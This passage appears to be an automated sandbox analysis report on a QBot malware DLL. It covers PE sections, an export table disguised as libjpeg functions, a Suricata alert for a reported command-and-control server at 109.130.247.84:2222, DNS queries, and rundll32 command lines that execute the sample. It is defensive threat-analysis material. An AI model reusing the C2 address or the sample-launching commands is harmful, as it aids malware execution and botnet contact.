                                                                                                                                                                                                                                                                          .rdata0x470000x240c40x24200False0.042259137110726645data2.965728380228879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          /40x6c0000x59540x5a00False0.266796875data4.8715558095609435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .bss0x720000x3e40x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .edata0x730000xc530xe00False0.41322544642857145data4.9102030514161354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .idata0x740000x5a40x600False0.42578125data4.85888040741761IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .CRT0x750000x2c0x200False0.0546875data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .tls0x760000x200x200False0.052734375data0.28655982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .reloc0x770000x17900x1800False0.8084309895833334data6.600381492361927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          /140x790000x380x200False0.068359375Matlab v4 mat-file (little endian) *, rows 2, columns 2621440.23653878450968063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          /290x7a0000xba40xc00False0.4329427083333333data5.509643399768958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          /410x7b0000x870x200False0.2265625data1.630440230936631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          /550x7c0000x24f4d0x25000False0.9180215371621622data7.808486707251028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          /670xa10000x380x200False0.1171875data0.6947581054952565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                          KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, InterlockedCompareExchange, InterlockedExchange, LeaveCriticalSection, LoadLibraryA, QueryPerformanceCounter, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualProtect, VirtualQuery
                                                                                                                                                                                                                                                                          msvcrt.dll__dllonexit, _amsg_exit, _initterm, _iob, _lock, _onexit, _unlock, abort, calloc, exit, ferror, fflush, fprintf, fread, free, fwrite, getenv, malloc, memcpy, memset, sprintf, sscanf, strlen, strncmp, vfprintf
                                                                                                                                                                                                                                                                          NameOrdinalAddress
                                                                                                                                                                                                                                                                          lcopy_block_row10x6adade90
                                                                                                                                                                                                                                                                          lcopy_sample_rows20x6adade30
                                                                                                                                                                                                                                                                          ldiv_round_up30x6adaddf0
                                                                                                                                                                                                                                                                          linit_1pass_quantizer40x6adabf70
                                                                                                                                                                                                                                                                          linit_2pass_quantizer50x6adadc70
                                                                                                                                                                                                                                                                          linit_c_coef_controller60x6ad82a40
                                                                                                                                                                                                                                                                          linit_c_main_controller70x6ad8c450
                                                                                                                                                                                                                                                                          linit_c_master_control80x6ad8f7f0
                                                                                                                                                                                                                                                                          linit_c_prep_controller90x6ad933c0
                                                                                                                                                                                                                                                                          linit_color_converter100x6ad83cf0
                                                                                                                                                                                                                                                                          linit_color_deconverter110x6ad9a0e0
                                                                                                                                                                                                                                                                          linit_compress_master120x6ad8c240
                                                                                                                                                                                                                                                                          linit_d_coef_controller130x6ad97f90
                                                                                                                                                                                                                                                                          linit_d_main_controller140x6ad9d790
                                                                                                                                                                                                                                                                          linit_d_post_controller150x6ada4f10
                                                                                                                                                                                                                                                                          linit_downsampler160x6ad93f00
                                                                                                                                                                                                                                                                          linit_forward_dct170x6ad84840
                                                                                                                                                                                                                                                                          linit_huff_decoder180x6ad9c280
                                                                                                                                                                                                                                                                          linit_huff_encoder190x6ad8c190
                                                                                                                                                                                                                                                                          linit_input_controller200x6ad9d100
                                                                                                                                                                                                                                                                          linit_inverse_dct210x6ad9a8b0
                                                                                                                                                                                                                                                                          linit_marker_reader220x6ad9fd60
                                                                                                                                                                                                                                                                          linit_marker_writer230x6ad8e8a0
                                                                                                                                                                                                                                                                          linit_master_decompress240x6ada0a60
                                                                                                                                                                                                                                                                          linit_memory_mgr250x6adaf3e0
                                                                                                                                                                                                                                                                          linit_merged_upsampler260x6ada3760
                                                                                                                                                                                                                                                                          linit_phuff_decoder270x6ada4af0
                                                                                                                                                                                                                                                                          linit_phuff_encoder280x6ad92de0
                                                                                                                                                                                                                                                                          linit_upsampler290x6ada55e0
                                                                                                                                                                                                                                                                          lpeg_CreateCompress300x6ad815b0
                                                                                                                                                                                                                                                                          lpeg_CreateDecompress310x6ad94f40
                                                                                                                                                                                                                                                                          lpeg_abort320x6ad8fb40
                                                                                                                                                                                                                                                                          lpeg_abort_compress330x6ad81730
                                                                                                                                                                                                                                                                          lpeg_abort_decompress340x6ad95150
                                                                                                                                                                                                                                                                          lpeg_add_quant_table350x6ad8fc20
                                                                                                                                                                                                                                                                          lpeg_alloc_huff_table360x6ad8fbf0
                                                                                                                                                                                                                                                                          lpeg_alloc_quant_table370x6ad8fbc0
                                                                                                                                                                                                                                                                          lpeg_calc_output_dimensions380x6ada0270
                                                                                                                                                                                                                                                                          lpeg_consume_input390x6ad95430
                                                                                                                                                                                                                                                                          lpeg_copy_critical_parameters400x6ad94c60
                                                                                                                                                                                                                                                                          lpeg_crop_scanline1050x6ad95bb0
                                                                                                                                                                                                                                                                          lpeg_default_colorspace410x6ad8fe60
                                                                                                                                                                                                                                                                          lpeg_destroy420x6ad8fb90
                                                                                                                                                                                                                                                                          lpeg_destroy_compress430x6ad81720
                                                                                                                                                                                                                                                                          lpeg_destroy_decompress440x6ad95140
                                                                                                                                                                                                                                                                          lpeg_fdct_float450x6ada5ce0
                                                                                                                                                                                                                                                                          lpeg_fdct_ifast460x6ada5ec0
                                                                                                                                                                                                                                                                          lpeg_fdct_islow470x6ada60e0
                                                                                                                                                                                                                                                                          lpeg_fill_bit_buffer480x6ad9b0a0
                                                                                                                                                                                                                                                                          lpeg_finish_compress490x6ad817f0
                                                                                                                                                                                                                                                                          lpeg_finish_decompress500x6ad95740
                                                                                                                                                                                                                                                                          lpeg_finish_output510x6ad963f0
                                                                                                                                                                                                                                                                          lpeg_free_large520x6adaf570
                                                                                                                                                                                                                                                                          lpeg_free_small530x6adaf550
                                                                                                                                                                                                                                                                          lpeg_gen_optimal_table540x6ad8bcf0
                                                                                                                                                                                                                                                                          lpeg_get_large550x6adaf560
                                                                                                                                                                                                                                                                          lpeg_get_small560x6adaf540
                                                                                                                                                                                                                                                                          lpeg_has_multiple_scans570x6ad95700
                                                                                                                                                                                                                                                                          lpeg_huff_decode580x6ad9b1e0
                                                                                                                                                                                                                                                                          lpeg_idct_1x1590x6adab430
                                                                                                                                                                                                                                                                          lpeg_idct_2x2600x6adab130
                                                                                                                                                                                                                                                                          lpeg_idct_4x4610x6adaace0
                                                                                                                                                                                                                                                                          lpeg_idct_float620x6ada6380
                                                                                                                                                                                                                                                                          lpeg_idct_ifast630x6ada6880
                                                                                                                                                                                                                                                                          lpeg_idct_islow640x6ada6ea0
                                                                                                                                                                                                                                                                          lpeg_input_complete650x6ad956c0
                                                                                                                                                                                                                                                                          lpeg_make_c_derived_tbl660x6ad8b7a0
                                                                                                                                                                                                                                                                          lpeg_make_d_derived_tbl670x6ad9ac10
                                                                                                                                                                                                                                                                          lpeg_mem_available680x6adaf580
                                                                                                                                                                                                                                                                          lpeg_mem_dest1020x6ad966f0
                                                                                                                                                                                                                                                                          lpeg_mem_init690x6adaf5b0
                                                                                                                                                                                                                                                                          lpeg_mem_src1030x6ad969e0
                                                                                                                                                                                                                                                                          lpeg_mem_term700x6adaf5c0
                                                                                                                                                                                                                                                                          lpeg_new_colormap710x6ada09f0
                                                                                                                                                                                                                                                                          lpeg_open_backing_store720x6adaf590
                                                                                                                                                                                                                                                                          lpeg_quality_scaling730x6ad8fda0
                                                                                                                                                                                                                                                                          lpeg_read_coefficients740x6ada58d0
                                                                                                                                                                                                                                                                          lpeg_read_header750x6ad95160
                                                                                                                                                                                                                                                                          lpeg_read_raw_data760x6ad962c0
                                                                                                                                                                                                                                                                          lpeg_read_scanlines770x6ad95d90
                                                                                                                                                                                                                                                                          lpeg_resync_to_restart780x6ad9fc20
                                                                                                                                                                                                                                                                          lpeg_save_markers790x6ad9fed0
                                                                                                                                                                                                                                                                          lpeg_set_colorspace800x6ad90910
                                                                                                                                                                                                                                                                          lpeg_set_defaults810x6ad902a0
                                                                                                                                                                                                                                                                          lpeg_set_linear_quality820x6ad8fd40
                                                                                                                                                                                                                                                                          lpeg_set_marker_processor830x6ad9ffb0
                                                                                                                                                                                                                                                                          lpeg_set_quality840x6ad8fdd0
                                                                                                                                                                                                                                                                          lpeg_simple_progression850x6ad90d50
                                                                                                                                                                                                                                                                          lpeg_skip_scanlines1040x6ad95e30
                                                                                                                                                                                                                                                                          lpeg_start_compress860x6ad81a50
                                                                                                                                                                                                                                                                          lpeg_start_decompress870x6ad95ad0
                                                                                                                                                                                                                                                                          lpeg_start_output880x6ad96380
                                                                                                                                                                                                                                                                          lpeg_std_error890x6ada5c70
                                                                                                                                                                                                                                                                          lpeg_stdio_dest900x6ad96680
                                                                                                                                                                                                                                                                          lpeg_stdio_src910x6ad96930
                                                                                                                                                                                                                                                                          lpeg_suppress_tables920x6ad81740
                                                                                                                                                                                                                                                                          lpeg_write_coefficients930x6ad94ae0
                                                                                                                                                                                                                                                                          lpeg_write_m_byte940x6ad819e0
                                                                                                                                                                                                                                                                          lpeg_write_m_header950x6ad81980
                                                                                                                                                                                                                                                                          lpeg_write_marker960x6ad818f0
                                                                                                                                                                                                                                                                          lpeg_write_raw_data970x6ad81bb0
                                                                                                                                                                                                                                                                          lpeg_write_scanlines980x6ad81ae0
                                                                                                                                                                                                                                                                          lpeg_write_tables990x6adadeb0
                                                                                                                                                                                                                                                                          lround_up1000x6adade10
                                                                                                                                                                                                                                                                          next1010x6ad819f0
                                                                                                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          192.168.2.3109.130.247.844971422222404302 06/07/23-01:07:51.615603TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2497142222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:51.615602970 CEST497142222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:54.619105101 CEST497142222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:00.744590998 CEST497142222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:07.814640999 CEST497152222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:10.823513031 CEST497152222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:16.824029922 CEST497152222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:25.967291117 CEST497162222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:28.981441975 CEST497162222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:34.997510910 CEST497162222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:42.096127033 CEST497172222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:08:45.111337900 CEST497172222192.168.2.3109.130.247.84
                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.078953981 CEST5113953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.100409985 CEST53511398.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.573241949 CEST5295553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.078953981 CEST192.168.2.38.8.8.80xf20Standard query (0)linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.573241949 CEST192.168.2.38.8.8.80xbbe5Standard query (0)www.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.100409985 CEST8.8.8.8192.168.2.30xf20No error (0)linkedin.com13.107.42.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jun 7, 2023 01:07:50.611964941 CEST8.8.8.8192.168.2.30xbbe5No error (0)www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:01:04:36
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll"
                                                                                                                                                                                                                                                                          Imagebase:0xbd0000
                                                                                                                                                                                                                                                                          File size:126464 bytes
                                                                                                                                                                                                                                                                          MD5 hash:3B4636AE519868037940CA5C4272091B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                          Start time:01:04:36
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff745070000
                                                                                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:01:04:37
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1
                                                                                                                                                                                                                                                                          Imagebase:0xb0000
                                                                                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:01:04:37
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_block_row
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                          Start time:01:04:37
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                          Start time:01:04:38
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 664
                                                                                                                                                                                                                                                                          Imagebase:0xe20000
                                                                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:01:04:38
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 652
                                                                                                                                                                                                                                                                          Imagebase:0xe20000
                                                                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:01:04:40
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_sample_rows
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:01:04:43
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,ldiv_round_up
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                          Start time:01:04:46
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_block_row
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                          Start time:01:04:46
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_sample_rows
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:14
